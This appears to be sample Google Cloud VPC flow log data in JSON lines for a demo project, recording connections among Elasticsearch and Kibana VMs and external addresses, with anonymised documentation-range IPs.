-{"insertId":"y4wffpfk2eros","jsonPayload":{"bytes_sent":"160451","connection":{"dest_ip":"203.0.113.134","dest_port":33880,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821138391Z","packets_sent":"66","reporter":"SRC","rtt_msec":"252","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470071135Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2erod","jsonPayload":{"bytes_sent":"169173","connection":{"dest_ip":"10.87.40.76","dest_port":33574,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"64","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466811088Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2ero6","jsonPayload":{"bytes_sent":"118762","connection":{"dest_ip":"203.0.113.58","dest_port":65315,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220720811Z","packets_sent":"615","reporter":"SRC","rtt_msec":"210","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.844068405Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eron","jsonPayload":{"bytes_sent":"11137","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33576},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"96","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510464198Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project
","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2eroy","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":57300},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:22.156322353Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:22.044604322Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2erof","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"203.0.113.12","dest_port":54662,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:12.142682672Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:12.027895189Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erov","jsonPayload":{"bytes_sent":"11674","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33572},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"96","reporter":"DEST","rtt_msec":"335","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470754779Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_
name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erop","jsonPayload":{"bytes_sent":"62831","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33540},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789112562Z","packets_sent":"346","reporter":"DEST","rtt_msec":"313","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074813982Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2erou","jsonPayload":{"bytes_sent":"15169","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33574},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"93","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466811088Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2eroj","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":54662},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:12.142682672Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:12.027895189Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erow","jsonPayload":{"bytes_sent":"64588","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33560},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"11","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075859688Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork
_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} -{"insertId":"y4wffpfk2erot","jsonPayload":{"bytes_sent":"67315","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565156020Z","packets_sent":"354","reporter":"DEST","rtt_msec":"194","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150481417Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2eroq","jsonPayload":{"bytes_sent":"175633","connection":{"dest_ip":"10.87.40.76","dest_port":33576,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"67","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510464198Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2ero5","jsonPayload":{"bytes_sent":"116981","connection":{"dest_ip":"203.0.113.134","dest_port":33540,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789112562Z","packets_sent":"234","reporter":"SRC","rtt_msec":"313","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074813982Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2eroo","jsonPayload":{"bytes_sent":"67789","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33690},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.542406314Z","packets_sent":"344","reporter":"DEST","rtt_msec":"196","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075867049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"ptjoddfhmrhg9","jsonPayload":{"bytes_sent":"136166","connection":{"dest_ip":"203.0.113.134","dest_port":33538,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565124617Z","packets_sent":"245","reporter":"SRC","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074952616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
-{"insertId":"ptjoddfhmrhgh","jsonPayload":{"bytes_sent":"68262","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65257},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220614265Z","packets_sent":"718","reporter":"DEST","rtt_msec":"220","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.403388091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgj","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":52328},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:20.952481728Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:20.842840991Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
-{"insertId":"ptjoddfhmrhgr","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":59790},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:50.702194466Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:50.590894439Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgn","jsonPayload":{"bytes_sent":"73681","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65317},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"728","reporter":"DEST","rtt_msec":"62","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.740491697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
-{"insertId":"ptjoddfhmrhga","jsonPayload":{"bytes_sent":"92566","connection":{"dest_ip":"203.0.113.58","dest_port":65317,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"596","reporter":"SRC","rtt_msec":"62","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.740491697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgk","jsonPayload":{"bytes_sent":"66094","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33692},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565137912Z","packets_sent":"360","reporter":"DEST","rtt_msec":"181","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.558259934Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-proje
ct","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgm","jsonPayload":{"bytes_sent":"4900","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65262},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220741828Z","packets_sent":"542","reporter":"DEST","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.251430011Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
-{"insertId":"ptjoddfhmrhgd","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"198.51.100.107","dest_port":52328,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:20.952481728Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:20.842840991Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgl","jsonPayload":{"bytes_sent":"63280","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33552},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213081491Z","packets_sent":"361","reporter":"DEST","rtt_msec":"21","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075957044Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwor
k_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgi","jsonPayload":{"bytes_sent":"774029","connection":{"dest_ip":"198.51.100.239","dest_port":37292,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":24940,"city":"Bucharest","continent":"Europe","country":"rou","region":"Bucharest"},"end_time":"2019-06-14T03:49:35.841633589Z","packets_sent":"403","reporter":"SRC","rtt_msec":"102","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:35.048156283Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
-{"insertId":"ptjoddfhmrhgo","jsonPayload":{"bytes_sent":"359272","connection":{"dest_ip":"10.87.40.76","dest_port":33876,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933338264Z","packets_sent":"66","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466706102Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
-{"insertId":"ptjoddfhmrhgp","jsonPayload":{"bytes_sent":"310476","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.239","src_port":37292},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:35.841633589Z","packets_sent":"214","reporter":"DEST","rtt_msec":"102","src_location":{"asn":24940,"city":"Bucharest","continent":"Europe","country":"rou","region":"Bucharest"},"start_time":"2019-06-14T03:40:35.048156283Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 